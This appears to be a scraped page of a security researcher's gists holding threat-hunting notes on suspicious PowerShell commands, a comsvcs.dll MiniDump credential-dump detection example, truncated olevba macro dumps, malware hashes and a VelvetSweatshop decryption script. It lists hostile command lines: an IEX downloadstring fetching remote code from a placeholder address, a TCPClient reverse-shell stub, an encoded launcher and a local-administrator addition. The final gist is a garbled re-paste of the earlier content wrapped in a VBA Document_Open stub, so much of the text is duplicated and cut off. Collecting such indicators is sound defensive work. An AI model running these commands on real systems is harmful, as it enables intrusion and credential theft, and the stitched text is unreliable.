John Lambert JohnLaTwC

## ideas.txt
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject  Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber

C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"

## examples.txt
By @JohnLaTwC

References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166  - Calling MiniDump export by ordinal examples: (comsvcs,#24)

Detection Examples:

"C:\Windows\System32\rundll32.exe"  C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full

## gist:5f3d5653ec20e206df7fda206a33db4a
> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"  /reg:64

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"  /reg:32

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"

## VBA macro
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Dim isR As Boolean

## hashes.txt
https://www.virustotal.com/gui/search/gen_excel_xor_obfuscation_velvetsweatshop/comments

XOR encrypted .XLS
0d01bf2ba4985397910a7924c02036b71132febe46f5f9b79a1bd3de440dc53d
0e334135f0bc0e6832c50ec2fe3681816fd63a1843214a433cc92f59e77a4247
1bcf2d09a64a536efa4831600d00c6daad6b1751fa6d2ae111a7abb7ff0b61bb
307ea21a8cba83a8d7e58ebbd131a63cb8ae3d2281bd7a93004d8be78b70107e
386f8f8b2a9d16767e1b17b714e87cd4f0b234bfded0ed2752b9a2568edeb15f
640508607e89322f8a4cb844f33fad2ef51fc22afdbec3224ec8f9ef8a345edc
92859da9f5ec97c9c7646122138e996bb57021bb9fdee295f5ddb960390682e4

## remove.py
filename = r"419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e"
password = "VelvetSweatshop"
encryption_removed_filename = filename  + '.saved.xls'

from xlrd import *
import win32com.client
xlApp = win32com.client.Dispatch("Excel.Application")
xlwb = xlApp.Workbooks.Open(filename, Password=password)
xlwb.SaveAs(encryption_removed_filename)
xlApp.Application.quit()

## hashes on VT
419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e
b6d8909eef7b6a573ed668c4f31e8da8dc80f80c2a45074c81a157aebafb1ed7
df08a59ec2e0cbb8a061d56fa66bcb9e0ab8bfe5201f84ae07b7ac1832c13301
748d566d867a4667be25bdcba01e114bb3e8fa09d4a1d007f36ec9b093023dc5
f4256d69b126ae9f3ae76caa6a24fade4a2cd1f036abf1e3177124c7086725dd
1eef14ff38cdfe55bb255de4d5f8c383198987f113898a8e3866a0752c4d337b
8257663d61277d20aa2fecf3e54a6a04a135919b14c97590a3cd1022c0e4590c
d4aec8c01b61e2fc6eb9a3ad715a367f8ccb38df4dcf77aaae405611b4edb9b9
ca7ef70f3dc9a6e3bac27062d139e3588c13c2601ae71b1fe9ed1ca864281cb5
c31a630707b3f2f378915107920eb4bfcb806c0b77be6037e2e8a63596cd797a

## raccine.cpp
// Raccine
// A Simple Ransomware Vaccine
// https://github.com/Neo23x0/Raccine
//
// Florian Roth, Ollie Whitehouse

#include <WCHAR.h>
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

## 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public RUNNING As Boolean

## gist:c8414282ce49acc88c1ac39f5fab8e78
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a16ac529b34aab3eb7e262b830d73aa78aa967ad4a8810349040cdbbe2e885b5
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If Mac Then
Private Sub Document_Open()
	// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
	powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
	powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
	powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
	powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
	powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct \| Select-Object UUID
	powershell.exe /c Get-WmiObject Win32_bios \| Select-Object SerialNumber
	powershell.exe /c Get-WmiObject Win32_PhysicalMedia \| Select-Object SerialNumber

	C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
	By @JohnLaTwC

	References:
	https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
	https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
	https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)

	Detection Examples:

	"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
	> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:64

	> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:32

	> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe"
	olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO Sheet1.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	Dim isR As Boolean
	https://www.virustotal.com/gui/search/gen_excel_xor_obfuscation_velvetsweatshop/comments

	XOR encrypted .XLS
	0d01bf2ba4985397910a7924c02036b71132febe46f5f9b79a1bd3de440dc53d
	0e334135f0bc0e6832c50ec2fe3681816fd63a1843214a433cc92f59e77a4247
	1bcf2d09a64a536efa4831600d00c6daad6b1751fa6d2ae111a7abb7ff0b61bb
	307ea21a8cba83a8d7e58ebbd131a63cb8ae3d2281bd7a93004d8be78b70107e
	386f8f8b2a9d16767e1b17b714e87cd4f0b234bfded0ed2752b9a2568edeb15f
	640508607e89322f8a4cb844f33fad2ef51fc22afdbec3224ec8f9ef8a345edc
	92859da9f5ec97c9c7646122138e996bb57021bb9fdee295f5ddb960390682e4
	419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e
	b6d8909eef7b6a573ed668c4f31e8da8dc80f80c2a45074c81a157aebafb1ed7
	df08a59ec2e0cbb8a061d56fa66bcb9e0ab8bfe5201f84ae07b7ac1832c13301
	748d566d867a4667be25bdcba01e114bb3e8fa09d4a1d007f36ec9b093023dc5
	f4256d69b126ae9f3ae76caa6a24fade4a2cd1f036abf1e3177124c7086725dd
	1eef14ff38cdfe55bb255de4d5f8c383198987f113898a8e3866a0752c4d337b
	8257663d61277d20aa2fecf3e54a6a04a135919b14c97590a3cd1022c0e4590c
	d4aec8c01b61e2fc6eb9a3ad715a367f8ccb38df4dcf77aaae405611b4edb9b9
	ca7ef70f3dc9a6e3bac27062d139e3588c13c2601ae71b1fe9ed1ca864281cb5
	c31a630707b3f2f378915107920eb4bfcb806c0b77be6037e2e8a63596cd797a
	// Raccine
	// A Simple Ransomware Vaccine
	// https://github.com/Neo23x0/Raccine
	//
	// Florian Roth, Ollie Whitehouse

	#include <WCHAR.h>
	#include <windows.h>
	#include <tlhelp32.h>
	#include <stdio.h>
	olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
	Type: OLE
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	Public RUNNING As Boolean
	olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: a16ac529b34aab3eb7e262b830d73aa78aa967ad4a8810349040cdbbe2e885b5
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisDocument.cls
	in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	#If Mac Then
	Private Sub Document_Open()